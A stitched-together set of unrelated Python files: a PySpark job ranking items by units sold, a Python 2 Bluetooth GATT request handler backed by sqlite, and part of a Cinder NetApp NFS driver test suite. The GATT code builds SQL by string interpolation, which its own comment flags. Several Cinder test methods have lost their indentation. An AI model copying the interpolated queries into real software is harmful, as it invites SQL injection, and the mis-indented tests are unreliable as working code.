                    itertools.islice(itertools.count(1101, 2), 50),
                    itertools.repeat({'value': 0.5})))))
    testing_common.AddRows(params['test_path'], rows)
    results = pinpoint_request.PinpointParamsFromBisectParams(params)
    # We overrode the anomaly config with a window of 1, and there's only a
    # single row with value 0.1, the rest are 0.0.
    self.assertEqual(0.4, results['comparison_magnitude'])
|
|
#MIT License
#
#Copyright (c) 2017 Willian Fuks
#
#Permission is hereby granted, free of charge, to any person obtaining a copy
#of this software and associated documentation files (the "Software"), to deal
#in the Software without restriction, including without limitation the rights
#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
#copies of the Software, and to permit persons to whom the Software is
#furnished to do so, subject to the following conditions:
#
#The above copyright notice and this permission notice shall be included in all
#copies or substantial portions of the Software.
#
#THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
#FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
#SOFTWARE.
"""
Set of tools to run Marreco's Top Seller algorithm in spark.
"""
import os
import sys
import json
import operator
import math
import random
import argparse
from collections import defaultdict
sys.path.append('..')
from base import MarrecoBase
from py4j.protocol import Py4JJavaError
from pyspark.sql.utils import AnalysisException
from pyspark.sql import SparkSession
from pyspark.sql import types as stypes
class MarrecoTopSellerJob(MarrecoBase):
    """Runs Marreco's Top Seller algorithm on Spark.

    The job has two phases: ``transform_data`` turns raw datajet JSON
    logs into daily intermediate files of ``[item_key, items_sold]``
    pairs, and ``build_marreco`` unions those daily files, sums the
    quantities per item and saves the items ranked by units sold.

    :type context: `pyspark.SparkContext`
    :param context: context in which jobs are run.
    """
    def transform_data(self, sc, args):
        """Reads datajet files and prepares them on a daily intermediary
        basis for Marreco's Top Seller algorithm.

        A day is skipped when its intermediate file already exists and is
        non-empty, unless ``args.force == 'yes'``.

        :type sc: `pyspark.SparkContext`
        :param sc: spark context for running jobs.

        :type args: Namespace
        :param args: expected attributes:

            * ``days_init`` (int): how many days back in time to start
              scanning input files.
            * ``days_end`` (int): how many days back to stop scanning
              (inclusive; must be <= ``days_init``).
            * ``inter_uri`` (str): URI template for where to save
              intermediate results.
            * ``force`` (str): either ``yes``, which forces recreation of
              files, or ``no``, in which case existing files are kept.
            * ``source_uri`` (str): URI template from where to read files.
        """
        spark = SparkSession(sc)
        for day in range(args.days_init, args.days_end - 1, -1):
            formatted_day = self.get_formatted_date(day)
            source_uri = args.source_uri.format(formatted_day)
            inter_uri = args.inter_uri.format(formatted_day)
            try:
                # Cheap existence/emptiness probe: ``first()`` returns
                # None for an empty dataset and raises when the file is
                # missing altogether.
                inter_data = spark.read.json(
                    inter_uri, schema=self._load_top_seller_schema()).first()
                if args.force == 'yes' or not inter_data:
                    self._process_datajet_day(sc,
                                              source_uri,
                                              inter_uri,
                                              'overwrite')
            except (Py4JJavaError, AnalysisException):
                # No intermediate file for this day yet; create it.
                self._process_datajet_day(sc, source_uri, inter_uri)
            finally:
                print('processed data for {} day'.format(day))
    def _process_datajet_day(self, sc, uri, inter_uri, mode=None):
        """Gets datajet json-like files and transforms them into data like
        ``[(sku, items_sold), ...]``, saving the result.

        :type sc: `pyspark.SparkContext`
        :param sc: context to run spark jobs.

        :type uri: str
        :param uri: where the input files are located.

        :type inter_uri: str
        :param inter_uri: where intermediate results should be saved.

        :type mode: str
        :param mode: indicates how data should be saved. If ``None`` then
                     throws error if file already exists. If ``overwrite``
                     then deletes previous file and saves a new one.
        """
        sc.textFile(uri) \
            .flatMap(lambda x: self._process_json(x)) \
            .filter(lambda x: x) \
            .reduceByKey(operator.add) \
            .toDF(schema=self._load_top_seller_schema()) \
            .write.json(inter_uri, compression='gzip', mode=mode)
    def _load_top_seller_schema(self):
        """Loads schema for top seller intermediate data saved like
        ``[item_key, items_sold]``.

        :rtype: `pyspark.sql.types.StructType`
        :returns: schema for top selling data.
        """
        return stypes.StructType(fields=[
            stypes.StructField("item_key", stypes.StringType()),
            stypes.StructField("value", stypes.IntegerType())])
    def build_marreco(self, sc, args):
        """Aggregates the daily intermediate files and saves items ranked
        by total units sold.

        :type sc: `pyspark.SparkContext`
        :param sc: spark context for running jobs.

        :type args: Namespace
        :param args: expected attributes:

            * ``days_init`` (int): how many days back to start reading
              intermediary daily results.
            * ``days_end`` (int): how many days back to stop reading.
            * ``inter_uri`` (str): URI template where intermediary results
              are read from.
            * ``top_seller_uri`` (str): URI for where to save results.
        """
        spark = SparkSession(sc)
        data = sc.emptyRDD()
        for day in range(args.days_init, args.days_end - 1, -1):
            formatted_day = self.get_formatted_date(day)
            inter_uri = self._render_inter_uri(args.inter_uri.format(
                formatted_day))
            data = data.union(spark.read.json(inter_uri,
                schema=self._load_top_seller_schema()).rdd)
        # Total units per item, most-sold first.
        data = data.reduceByKey(operator.add) \
            .sortBy(lambda x: x[1], False)
        self._save_top_seller_matrix(args.top_seller_uri, data)
    def _save_top_seller_matrix(self, top_seller_uri, data):
        """Loads top seller schema and saves final results as
        ``[(item_key, items_sold), (item_key, items_sold), ...]``.

        :type top_seller_uri: str
        :param top_seller_uri: uri for where to save the matrix.

        :type data: RDD
        :param data: RDD with data like ``[item_key, items_sold]``.
        """
        data.toDF(schema=self._load_top_seller_schema()) \
            .write.json(top_seller_uri, compression='gzip', mode='overwrite')
    def _render_inter_uri(self, inter_uri, name_pattern='part-*'):
        """Joins an intermediate-results URI with the file pattern spark
        uses when writing partitioned output.

        :type inter_uri: str
        :param inter_uri: URI used for saving intermediate transformation
                          results.

        :type name_pattern: str
        :param name_pattern: pattern used by spark to save multiple files.

        :rtype: str
        :returns: URI glob for reading the data back.
        """
        return os.path.join(inter_uri, name_pattern)
    @staticmethod
    def _process_json(row):
        """Mapper function: extracts ``(sku, items_sold)`` interactions
        from one datajet log line.

        Only order-confirmation events from the ``fish`` tracker that
        carry a timestamp and a client id are considered.

        :type row: str
        :param row: json string with datajet data.

        :rtype: generator
        :returns: yields ``(sku, items_sold)`` tuples; on any failure
                  yields a single empty list, which the downstream
                  ``filter`` step drops.
        """
        try:
            r = json.loads(row)
            event = r['event']
            if (event['source']['tracker'] == 'fish' and
                    'local_timestamp' in event and
                    event['identifiers']['djUCID']['value'] and
                    event['type'] == "orderconfirmation"):
                skus = [p['group_id'] for p in event['details']['products']]
                quantities = [int(q) for q in event['details']['quantities']]
                for sale in zip(skus, quantities):
                    yield sale
        except Exception:
            # ``except Exception`` (not a bare ``except:``) so that
            # SystemExit/KeyboardInterrupt still propagate.
            yield []
    @staticmethod
    def process_sysargs(args):
        """Parses command line arguments.

        :type args: list of str
        :param args: raw argument strings (e.g. ``sys.argv[1:]``).

        :rtype: Namespace
        :returns: parsed arguments.
        """
        parser = argparse.ArgumentParser()
        parser.add_argument('--days_init',
                            dest='days_init',
                            type=int,
                            help=("Total amount of days to come back in time "
                                  "from today's date."))
        parser.add_argument('--days_end',
                            dest='days_end',
                            type=int,
                            # Fixed: help text used to be a copy of
                            # --days_init's and did not describe this flag.
                            help=("How many days back in time to stop "
                                  "scanning (inclusive)."))
        parser.add_argument('--source_uri',
                            dest='source_uri',
                            type=str,
                            help=("URI template from where to read source "
                                  "files from."))
        parser.add_argument('--inter_uri',
                            dest='inter_uri',
                            type=str,
                            help=('URI for saving intermediary results.'))
        parser.add_argument('--top_seller_uri',
                            dest='top_seller_uri',
                            type=str,
                            help=('URI for saving top_seller results.'))
        parser.add_argument('--force',
                            dest='force',
                            type=str,
                            help=('If ``yes`` then replace all files with new ones. '
                                  ' If ``no``, then no replacing happens.'))
        args = parser.parse_args(args)
        return args
|
|
'''
Created on Jan 11, 2014
@author: mxu
This module does dirty work to handle gatt related request
'''
import sqlite3 as lite
import utils
import bluetooth
class sqls:
    """Namespace for the raw SQL templates run against the local GATT
    attribute table (``defaultTable``).

    NOTE(review): queries are built with ``%`` string interpolation, not
    bound parameters, so callers must only pass trusted, locally-derived
    values (this is local test tooling).
    """
    # Attributes of one uuid whose handle falls in [start, end).
    sql_select_handles_in_range = '''
    select handle, value, properties, permission from defaultTable where uuid = "%s" and handle >= "%s" and handle < "%s";
    '''
    # Handle of a primary service matched by uuid and value.
    sql_select_primary_service_by_uuid = '''
    select handle from defaultTable where uuid = "%s" and value = "%s";
    '''
    # Every handle in the table.
    sql_select_handles = '''
    select handle from defaultTable;
    '''
    # uuid of one attribute, looked up by handle.
    sql_select_uuid_by_handle = '''
    select uuid from defaultTable where handle = "%s";
    '''
    # value plus access metadata of one attribute, looked up by handle.
    sql_select_value_by_handle = '''
    select value, properties, permission from defaultTable where handle = "%s";
    '''
# Usable payload budget (bytes) when packing Read-By-Group-Type response
# PDUs; presumably the default ATT MTU of 23 minus the 3-byte ATT header
# -- TODO confirm.
ATT_MTU = 20
class BLEGattHelper:
    '''
    Serves incoming ATT/GATT requests out of a local sqlite attribute
    table (``gattServer.rdb``) and replies through ``ble_builder``.
    '''
    def __init__(self,ble_builder):
        '''
        Constructor.

        ``ble_builder``: object whose ``send(opcode, **fields)`` builds
        and transmits the vendor HCI commands (e.g. "fd11") used to
        answer ATT requests.
        '''
        self.ble_builder = ble_builder
        # All attribute handles known to the GATT table, in select order.
        self.handles = self._get_handles()
        # Handles at or below this value are reserved for internal
        # services and handled specially on writes.
        self.preserved_handle_eom = "0013"
    def AttGrpTypeRspHandler(self, dictionary):
        '''
        Handles an ATT Read By Group Type request: looks up the gatt
        table and replies with the matching attribute group entries.
        '''
        def _sendATTGrpTypeRsp(conn_handle, data, data_length):
            # data = "\x14\x00\x17\x00\x9d\x28\xd9\x02\x6e\x8a\x5a\xa8\xe7\x41\x41\x38\xa0\xf2\x83\xdb"
            print(utils.printOutput(self.ble_builder.send("fd11", conn_handle = conn_handle, data_length = data_length, value = data)))
        def _get_pdu(data):
            # 0xffffffff marks "no more attributes" (end of search).
            eof = "\xff\xff\xff\xff"
            pdu = ""
            # Per-entry length: 6 bytes (2 start + 2 end + 2 value) for
            # 16-bit uuids; switched to 0x14 for a 128-bit uuid below.
            length = "\x06"
            # NOTE(review): an earlier draft of this packing loop was kept
            # here commented out; removed as dead code for readability.
            if data:
                try:
                    for i in range(len(data)):
                        if data[i][0] == "001b":
                            pass
                        temp_start = utils.stringToSByteInHex(data[i][0])[::-1] #start handle
                        temp_value = utils.stringToSByteInHex(data[i][1].replace(":","")) #value
                        #get end handle
                        if i + 1 > range(len(data))[-1]:
                            temp_end = utils.stringToSByteInHex(self.handles[-1])[::-1] #this is the last service, end handle is the last one of all handles
                        else:
                            temp_end = utils.stringToSByteInHex(utils.stringMinusInHex(data[i+1][0],1))[::-1] #this is not the last service then the end handle is the handle of next service minus one
                        if len(temp_value) == 16: #this is 128bit uuid, then only return one service info
                            pdu = temp_start + temp_end + temp_value
                            length = "\x14" #set length to fit 128bit uuid
                            break
                        else:
                            if len(pdu) + 4 + len(temp_value) > ATT_MTU : #if total pdu exceeds the maximum length, do not append, only two services returned each time
                                break
                            elif i + 1 <= range(len(data))[-1]:
                                # Peek at the next entry: if it is a
                                # 128-bit uuid, close the pdu after the
                                # current entry so it can go out alone.
                                next_value = utils.stringToSByteInHex(data[i+1][1].replace(":",""))
                                if len(next_value) == 16:
                                    if pdu:
                                        pdu = pdu + temp_start + temp_end + temp_value
                                    else:
                                        pdu = temp_start + temp_end + temp_value
                                    break
                                else:
                                    pdu = pdu + temp_start + temp_end + temp_value
                            else:
                                pdu = pdu + temp_start + temp_end + temp_value #append pdu
                except Exception, e:
                    print e
                    pdu = eof
            else:
                pdu = eof
            return pdu, length
        conn_handle = dictionary['conn_handle']
        start_handle = dictionary['start_handle']
        end_handle = dictionary['end_handle']
        group_type = dictionary['group_type']
        conn_handle = conn_handle[0]
        uuid = group_type[1]
        start = start_handle[1]
        end = end_handle[1]
        sql = sqls.sql_select_handles_in_range % (uuid, start, end)
        data = self._execute_sql(sql)
        pdu = _get_pdu(data)
        _sendATTGrpTypeRsp(conn_handle, pdu[0], pdu[1])
        pass
    def ATTReadByTypeRspHandler(self, dictionary):
        '''
        Handles an ATT Read By Type request.

        Limitations:
        1. only the first matching key-value pair is returned, since in
           most cases only one key should be found.
        2. no permission restriction; all data are treated as readable.
        '''
        def _sendATTReadByTypeRsp(conn_handle, value, data_length):
            print("COMMAND: ATT_ReadByTypeRsp")
            print(utils.printOutput(self.ble_builder.send("fd09", conn_handle = conn_handle, data_length = data_length, value = value)))
        def _get_pdu(data):
            # Pack handle (byte-reversed, i.e. little-endian) followed by
            # the attribute value.
            handle = utils.stringToSByteInHex(data[0][0])[::-1]
            value = utils.stringToSByteInHex(data[0][1], ":")
            pdu = handle + value
            return pdu
        conn_handle = dictionary['conn_handle']
        start_handle = dictionary['start_handle']
        end_handle = dictionary['end_handle']
        _type = dictionary['type']
        conn_handle = conn_handle[0]
        start = start_handle[1]
        end = end_handle[1]
        uuid = _type[1]
        #get data from gatt table
        sql = sqls.sql_select_handles_in_range % (uuid, start, end)
        data = self._execute_sql(sql)
        pdu = _get_pdu(data)
        data_length = utils.getByteDataLengh(pdu)
        _sendATTReadByTypeRsp(conn_handle, pdu, data_length)
    def ATTReadBlobRspHandler(self, dictionary):
        '''
        Looks up the value for a given handle in the gatt table and sends
        it if readable; otherwise replies with READ_NOT_PERMITTED.
        '''
        def _sendATTReadBlobRsp(conn_handle, value):
            print("COMMAND: ATT_ReadBlobRsp")
            print(utils.printOutput(self.ble_builder.send("fd0d", conn_handle = conn_handle, value = value)))
        conn_handle = dictionary['conn_handle']
        handle = dictionary['handle']
        req_opcode = dictionary['event'][0]
        conn_handle = conn_handle[0]
        handle_str = handle[1]
        handle_raw = utils.stringToSByteInHex(handle[1])
        #get data from gatt table
        sql = sqls.sql_select_value_by_handle % handle_str
        data = self._execute_sql(sql)
        value = utils.stringToSByteInHex(data[0][0], ":")
        data_property = data[0][1]
        data_permission = data[0][2]
        if data_property:
            properties = utils.stringToSByteInHex(data_property)
        else:
            properties = None
        if data_permission:
            permission = utils.stringToSByteInHex(data_permission)
        else:
            permission = None
        if self._canRead(properties, permission):
            _sendATTReadBlobRsp(conn_handle, value)
        else:
            self.ATTErrorRspHandler(conn_handle, req_opcode[-1], handle_raw, bluetooth.errorRsp.READ_NOT_PERMITTED)
    def ATTWriteReqHandler(self, dictionary, func):
        '''
        Handles an ATT Write Request and acknowledges it.

        Limitation: no signature and no command-type checking.
        '''
        def _sendATTWriteRsp(conn_handle):
            print("COMMAND: ATT_WriteRsp")
            print(utils.printOutput(self.ble_builder.send("fd13", conn_handle = conn_handle)))
        def _handleIndication(conn_handle, handle, start_handle, end_handle): #to-do refactor for better usability
            print("COMMAND: ATT_HandleValueIndication")
            handle = handle
            value = start_handle+end_handle
            # print(utils.printOutput(self.ble_builder.send("fd1d", conn_handle = conn_handle, handle = handle, value = value)))
        conn_handle = dictionary['conn_handle'][0]
        handle = dictionary['handle']
        value = dictionary['value']
        value_str = value[1]
        handle_raw = handle[0]
        handle_str = handle[1]
        _sendATTWriteRsp(conn_handle)
        #get data from gatt table
        if handle_str < self.preserved_handle_eom: #attempt to write preserved services
            if handle_str == "0009" and value_str == "0002": #ask for service changes, temporarily fixed to return non-reserved handles
                start_handle = utils.stringToSByteInHex(utils.stringMinusInHex(self.preserved_handle_eom, -1))[::-1]
                end_handle = utils.stringToSByteInHex(self.handles[-1])[::-1]
                char_handle = utils.hexMinusInHex(handle_raw, 1)
                _handleIndication(conn_handle, char_handle, start_handle, end_handle)
        else: #external services, temporarily fixed to trigger the notification callback or do nothing
            if value_str == "0001": #Notification
                # The written handle is the CCC descriptor; the
                # characteristic itself sits one handle lower.
                sql = sqls.sql_select_uuid_by_handle % utils.stringMinusInHex(handle_str, 1)
                data = self._execute_sql(sql)
                uuid = data[0][0]
                char_handle = utils.hexMinusInHex(handle_raw, 1)
                func(uuid, char_handle, conn_handle)
    def ATTErrorRspHandler(self, conn_handle, req_opcode, handle, error_code):
        '''
        Sends an ATT Error Response for the given request opcode/handle.
        '''
        print("COMMAND: ATT_ErrorRsp")
        handle = handle
        print(utils.printOutput(self.ble_builder.send("fd01", conn_handle = conn_handle, req_opcode = req_opcode, handle = handle, error_code = error_code)))
    def _get_handles(self):
        '''
        Returns every attribute handle in the GATT table, in select order.
        '''
        sql = sqls.sql_select_handles
        data = self._execute_sql(sql)
        handles = []
        for row in data:
            handles.append(row[0])
        return handles
    def _canRead(self, properties, permission):
        '''
        Decides whether an attribute may be read.

        Logic:
        1. if permission is None and properties is Read, can Read
        2. if permission is readable or read/write, then if properties is None, can read
        3. if permission is readable or read/write, then if properties is Read, can read
        '''
        if not permission:
            if properties:
                if (properties[-1] == bluetooth.properties.Read):
                    return True
        if (permission == bluetooth.attrPermission.GATT_PERMIT_READ) \
            or (permission == bluetooth.attrPermission.GATT_PERMIT_READ_AND_WRITE):
            if not properties:
                return True
            if (properties[-1] == bluetooth.properties.Read):
                return True
        return False
    def _execute_sql(self, sql):
        '''
        Runs one statement against the local ``gattServer.rdb`` sqlite
        database; returns the fetched rows for selects, an empty list
        otherwise (including on error, which is printed and swallowed).
        '''
        try:
            data = []
            conn = lite.connect('gattServer.rdb')
            conn.text_factory = str
            cursor = conn.cursor()
            cursor.execute(sql)
            if "select" in sql:
                for row in cursor:
                    data.append(row)
            else:
                pass
            conn.commit()
        except Exception, e:
            print e
        finally:
            if 'cursor' in locals():
                cursor.close()
            if 'conn' in locals():
                conn.close()
            # NOTE(review): returning from ``finally`` suppresses any
            # in-flight exception; kept as-is to preserve behavior.
            return data
def _get_pdu( data):
    '''
    Standalone copy of the PDU-packing loop used by
    ``BLEGattHelper.AttGrpTypeRspHandler``, exercised by the __main__
    harness below; returns the packed PDU hex-encoded for eyeballing.

    NOTE(review): unlike the class version this hard-codes "001b" as the
    last handle and uses a 12-byte budget instead of ATT_MTU -- presumably
    intentional for the fixed test fixtures; confirm before reuse.
    '''
    # 0xffffffff marks "no more attributes" (end of search).
    eof = "\xff\xff\xff\xff"
    pdu = ""
    if data:
        try:
            for i in range(len(data)):
                if data[i][0] == "0014":
                    pass
                temp_start = utils.stringToSByteInHex(data[i][0])[::-1] #start handle
                temp_value = utils.stringToSByteInHex(data[i][1].replace(":","")) #value
                #get end handle
                if i + 1 > range(len(data))[-1]:
                    temp_end = utils.stringToSByteInHex("001b")[::-1] #this is the last service, end handle is the last one of all handles
                else:
                    temp_end = utils.stringToSByteInHex(utils.stringMinusInHex(data[i+1][0],1))[::-1] #this is not the last service then the end handle is the handle of next service minus one
                if len(temp_value) == 16: #this is 128bit uuid, then only return one service info
                    pdu = temp_start + temp_end + temp_value
                    break
                else:
                    if len(pdu) + 4 + len(temp_value) > 12 : #if total pdu exceeds the maximum length, do not append, only two services returned each time
                        break
                    elif i + 1 <= range(len(data))[-1]:
                        # Peek ahead: a 128-bit uuid next means the pdu
                        # must be closed after the current entry.
                        next_value = utils.stringToSByteInHex(data[i+1][1].replace(":",""))
                        if len(next_value) == 16:
                            if pdu:
                                pdu = pdu + temp_start + temp_end + temp_value
                                break
                            else:
                                pdu = temp_start + temp_end + temp_value
                                break
                        else:
                            pdu = pdu + temp_start + temp_end + temp_value
                    else:
                        pdu = pdu + temp_start + temp_end + temp_value #append pdu
        except Exception, e:
            print e
            pdu = eof
    else:
        pdu = eof
    return pdu.encode('hex')
if __name__ == '__main__':
    # Ad-hoc smoke test for _get_pdu, covering: a single service, several
    # 16-bit services, a 128-bit uuid in first/middle/last position, and
    # empty input (which should print the eof marker).
    data = [("0001", "00:04")]
    print _get_pdu(data)
    data = [("0001", "00:00"), ("0004", "01:02")]
    print _get_pdu(data)
    data = [("0005", "00:00"), ("0008", "01:02"), ("000a", "02:02")]
    print _get_pdu(data)
    data = [("000d", "00:00"), ("001a", "01:02"), ("001f", "02:02"), ("0022", "03:04")]
    print _get_pdu(data)
    data = [("0001", "00:00"), ("0004", "01:02:03:04:05:06:07:08:09:10:11:12:13:14:15:16:"), ("0008", "02:02")]
    print _get_pdu(data)
    data = [("0001", "00:00"), ("0003", "abef"), ("000a", "01:02:03:04:05:06:07:08:09:10:11:12:13:14:15:16:"), ("0008", "02:02")]
    print _get_pdu(data)
    data = [("0001", "00:00"), ("0003", "abef"), ("0007", "dddd"), ("000a", "01:02:03:04:05:06:07:08:09:10:11:12:13:14:15:16:"), ("0008", "02:02")]
    print _get_pdu(data)
    data = [("0004", "01:02:03:04:05:06:07:08:09:10:11:12:13:14:15:16:"),("0001", "00:00"), ("0008", "02:02")]
    print _get_pdu(data)
    data = []
    print _get_pdu(data)
|
|
# Copyright (c) 2014 Andrew Kerr. All rights reserved.
# Copyright (c) 2015 Tom Barron. All rights reserved.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Unit tests for the NetApp NFS storage driver
"""
import os
import copy
import ddt
import mock
from os_brick.remotefs import remotefs as remotefs_brick
from oslo_utils import units
from cinder import exception
from cinder import test
from cinder.tests.unit.volume.drivers.netapp.dataontap import fakes as fake
from cinder import utils
from cinder.volume.drivers.netapp.dataontap.client import api as netapp_api
from cinder.volume.drivers.netapp.dataontap import nfs_base
from cinder.volume.drivers.netapp import utils as na_utils
from cinder.volume.drivers import nfs
@ddt.ddt
class NetAppNfsDriverTestCase(test.TestCase):
def setUp(self):
super(NetAppNfsDriverTestCase, self).setUp()
configuration = mock.Mock()
configuration.reserved_percentage = 0
configuration.nfs_mount_point_base = '/mnt/test'
configuration.reserved_percentage = 0
configuration.max_over_subscription_ratio = 1.1
kwargs = {'configuration': configuration}
with mock.patch.object(utils, 'get_root_helper',
return_value=mock.Mock()):
with mock.patch.object(remotefs_brick, 'RemoteFsClient',
return_value=mock.Mock()):
self.driver = nfs_base.NetAppNfsDriver(**kwargs)
self.driver.ssc_enabled = False
self.driver.db = mock.Mock()
    @mock.patch.object(nfs.NfsDriver, 'do_setup')
    @mock.patch.object(na_utils, 'check_flags')
    def test_do_setup(self, mock_check_flags, mock_super_do_setup):
        """do_setup validates config flags and runs the parent setup."""
        self.driver.do_setup(mock.Mock())
        self.assertTrue(mock_check_flags.called)
        self.assertTrue(mock_super_do_setup.called)
    def test_get_share_capacity_info(self):
        """_get_share_capacity_info converts raw byte counts into the
        GiB capacity/reservation dict reported for a share."""
        mock_get_capacity = self.mock_object(self.driver, '_get_capacity_info')
        mock_get_capacity.return_value = fake.CAPACITY_VALUES
        expected_total_capacity_gb = na_utils.round_down(
            fake.TOTAL_BYTES / units.Gi, '0.01')
        expected_free_capacity_gb = (na_utils.round_down(
            fake.AVAILABLE_BYTES / units.Gi, '0.01'))
        expected_reserved_percentage = round(
            self.driver.configuration.reserved_percentage)
        result = self.driver._get_share_capacity_info(fake.NFS_SHARE)
        self.assertEqual(expected_total_capacity_gb,
                         result['total_capacity_gb'])
        self.assertEqual(expected_free_capacity_gb,
                         result['free_capacity_gb'])
        self.assertEqual(expected_reserved_percentage,
                         round(result['reserved_percentage']))
def test_get_capacity_info_ipv4_share(self):
expected = fake.CAPACITY_VALUES
self.driver.zapi_client = mock.Mock()
get_capacity = self.driver.zapi_client.get_flexvol_capacity
get_capacity.return_value = fake.CAPACITY_VALUES
result = self.driver._get_capacity_info(fake.NFS_SHARE_IPV4)
self.assertEqual(expected, result)
get_capacity.assert_has_calls([
mock.call(fake.EXPORT_PATH)])
def test_get_capacity_info_ipv6_share(self):
expected = fake.CAPACITY_VALUES
self.driver.zapi_client = mock.Mock()
get_capacity = self.driver.zapi_client.get_flexvol_capacity
get_capacity.return_value = fake.CAPACITY_VALUES
result = self.driver._get_capacity_info(fake.NFS_SHARE_IPV6)
self.assertEqual(expected, result)
get_capacity.assert_has_calls([
mock.call(fake.EXPORT_PATH)])
    def test_create_volume(self):
        """create_volume returns the share as provider_location and does
        not refresh stale vols on success."""
        self.mock_object(self.driver, '_ensure_shares_mounted')
        self.mock_object(na_utils, 'get_volume_extra_specs')
        self.mock_object(self.driver, '_do_create_volume')
        self.mock_object(self.driver, '_do_qos_for_volume')
        update_ssc = self.mock_object(self.driver, '_update_stale_vols')
        expected = {'provider_location': fake.NFS_SHARE}
        result = self.driver.create_volume(fake.NFS_VOLUME)
        self.assertEqual(expected, result)
        self.assertEqual(0, update_ssc.call_count)
    def test_create_volume_no_pool(self):
        """create_volume raises InvalidHost when the host string carries
        no pool component."""
        volume = copy.deepcopy(fake.NFS_VOLUME)
        volume['host'] = '%s@%s' % (fake.HOST_NAME, fake.BACKEND_NAME)
        self.mock_object(self.driver, '_ensure_shares_mounted')
        self.assertRaises(exception.InvalidHost,
                          self.driver.create_volume,
                          volume)
    def test_create_volume_exception(self):
        """Failures inside _do_create_volume surface as
        VolumeBackendAPIException and do not refresh stale vols."""
        self.mock_object(self.driver, '_ensure_shares_mounted')
        self.mock_object(na_utils, 'get_volume_extra_specs')
        mock_create = self.mock_object(self.driver, '_do_create_volume')
        mock_create.side_effect = Exception
        update_ssc = self.mock_object(self.driver, '_update_stale_vols')
        self.assertRaises(exception.VolumeBackendAPIException,
                          self.driver.create_volume,
                          fake.NFS_VOLUME)
        self.assertEqual(0, update_ssc.call_count)
def test_create_volume_from_snapshot(self):
provider_location = fake.POOL_NAME
snapshot = fake.CLONE_SOURCE
self.mock_object(self.driver, '_clone_source_to_destination_volume',
mock.Mock(return_value=provider_location))
result = self.driver.create_cloned_volume(fake.NFS_VOLUME,
snapshot)
self.assertEqual(provider_location, result)
    def test_clone_source_to_destination_volume(self):
        """The clone helper returns the destination's pool as
        provider_location after cloning and applying QoS."""
        self.mock_object(self.driver, '_get_volume_location', mock.Mock(
            return_value=fake.POOL_NAME))
        self.mock_object(na_utils, 'get_volume_extra_specs', mock.Mock(
            return_value=fake.EXTRA_SPECS))
        self.mock_object(
            self.driver,
            '_clone_with_extension_check')
        self.mock_object(self.driver, '_do_qos_for_volume')
        expected = {'provider_location': fake.POOL_NAME}
        result = self.driver._clone_source_to_destination_volume(
            fake.CLONE_SOURCE, fake.CLONE_DESTINATION)
        self.assertEqual(expected, result)
    def test_clone_source_to_destination_volume_with_do_qos_exception(self):
        """A QoS failure during cloning surfaces as
        VolumeBackendAPIException."""
        self.mock_object(self.driver, '_get_volume_location', mock.Mock(
            return_value=fake.POOL_NAME))
        self.mock_object(na_utils, 'get_volume_extra_specs', mock.Mock(
            return_value=fake.EXTRA_SPECS))
        self.mock_object(
            self.driver,
            '_clone_with_extension_check')
        self.mock_object(self.driver, '_do_qos_for_volume', mock.Mock(
            side_effect=Exception))
        self.assertRaises(
            exception.VolumeBackendAPIException,
            self.driver._clone_source_to_destination_volume,
            fake.CLONE_SOURCE,
            fake.CLONE_DESTINATION)
    def test_clone_with_extension_check_equal_sizes(self):
        """No resize is attempted when source and destination sizes
        match."""
        clone_source = copy.deepcopy(fake.CLONE_SOURCE)
        clone_source['size'] = fake.VOLUME['size']
        self.mock_object(self.driver, '_clone_backing_file_for_volume')
        self.mock_object(self.driver, 'local_path')
        mock_discover = self.mock_object(self.driver,
                                         '_discover_file_till_timeout')
        mock_discover.return_value = True
        self.mock_object(self.driver, '_set_rw_permissions')
        mock_extend_volume = self.mock_object(self.driver, 'extend_volume')
        self.driver._clone_with_extension_check(clone_source, fake.NFS_VOLUME)
        self.assertEqual(0, mock_extend_volume.call_count)
    def test_clone_with_extension_check_unequal_sizes(self):
        """The destination is extended once when the clone source is
        larger than the destination volume."""
        clone_source = copy.deepcopy(fake.CLONE_SOURCE)
        clone_source['size'] = fake.VOLUME['size'] + 1
        self.mock_object(self.driver, '_clone_backing_file_for_volume')
        self.mock_object(self.driver, 'local_path')
        mock_discover = self.mock_object(self.driver,
                                         '_discover_file_till_timeout')
        mock_discover.return_value = True
        self.mock_object(self.driver, '_set_rw_permissions')
        mock_extend_volume = self.mock_object(self.driver, 'extend_volume')
        self.driver._clone_with_extension_check(clone_source, fake.NFS_VOLUME)
        self.assertEqual(1, mock_extend_volume.call_count)
    def test_clone_with_extension_check_extend_exception(self):
        """A failed extension cleans up the new volume and raises
        CinderException."""
        clone_source = copy.deepcopy(fake.CLONE_SOURCE)
        clone_source['size'] = fake.VOLUME['size'] + 1
        self.mock_object(self.driver, '_clone_backing_file_for_volume')
        self.mock_object(self.driver, 'local_path')
        mock_discover = self.mock_object(self.driver,
                                         '_discover_file_till_timeout')
        mock_discover.return_value = True
        self.mock_object(self.driver, '_set_rw_permissions')
        mock_extend_volume = self.mock_object(self.driver, 'extend_volume')
        mock_extend_volume.side_effect = Exception
        mock_cleanup = self.mock_object(self.driver,
                                        '_cleanup_volume_on_failure')
        self.assertRaises(exception.CinderException,
                          self.driver._clone_with_extension_check,
                          clone_source,
                          fake.NFS_VOLUME)
        self.assertEqual(1, mock_cleanup.call_count)
    def test_clone_with_extension_check_no_discovery(self):
        """CinderException is raised when the cloned file never shows up
        within the discovery timeout."""
        self.mock_object(self.driver, '_clone_backing_file_for_volume')
        self.mock_object(self.driver, 'local_path')
        self.mock_object(self.driver, '_set_rw_permissions')
        mock_discover = self.mock_object(self.driver,
                                         '_discover_file_till_timeout')
        mock_discover.return_value = False
